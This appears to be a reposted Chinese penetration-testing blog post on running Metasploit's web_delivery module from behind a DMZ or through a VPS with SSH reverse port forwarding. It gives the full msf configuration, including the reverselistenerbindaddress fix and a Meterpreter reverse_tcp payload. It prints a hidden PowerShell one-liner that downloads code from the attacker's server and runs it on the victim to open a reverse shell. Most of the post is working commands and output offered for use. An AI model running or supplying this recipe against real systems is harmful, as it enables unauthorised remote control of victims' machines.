之前碰到的问题，自己的主机做了DMZ，设置[b]web_delivery[/b]时，发现将lhost设置成外网ip，则脚本不能运行，如果设置成内网ip，则反弹payload反弹的地址为内网地址，即不可能获取到会话，查看详细配置信息，发现存在reverselistenerbindaddress 设置选项，解决了此问题，当然，此参数也适用于用vps转发端口使用本地msf的情况。详细配置如下：

使用vps转发 8081 端口到本地8081端口 (web_delivery服务端口)

ssh -N -R 8081:ip:8081 user@ip

使用vps转发 6666 端口到本地6666端口 （web_delivery payload 监听端口）

ssh -N -R 6666:ip:6666 user@ip

msf开启并配置web_delivery

msf > use exploit/multi/script/web_delivery

msf exploit(web_delivery) > set target 2

target => 2

msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(web_delivery) > set SRVPORT 8081

SRVPORT => 8081

msf exploit(web_delivery) > set URIPATH /

URIPATH => /

msf exploit(web_delivery) > set lhost ip  #外网ip地址

lhost => ip

msf exploit(web_delivery) > set lport 6666

lport => 6666

msf exploit(web_delivery) > set reverselistenerbindaddress 192.168.2.100 #内网ip地址

reverselistenerbindaddress => 192.168.2.100

msf exploit(web_delivery) > exploit

[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.2.100:6666

msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8081/

[*] Local IP: http://192.168.2.100:8081/

[*] Server started.

[*] Run the following command on the target machine:

powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');

客户端执行：

powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring

('http://外网ip:8081/');

内网msf获取meterpreter会话。

DMZ情形下，不需要做端口转发，只需要把lhost设置为外网ip地址，reverselistenerbindaddress 设置为内网ip地址即可。

文章出处：Evi1cg's blog   

原文链接：

https://evi1cg.me/archives/Use_Web_delivery_Under_DMZ.html

推荐文章++++

*渗透过程中的端口反弹

*内网kali 通过ngrok穿透反弹shell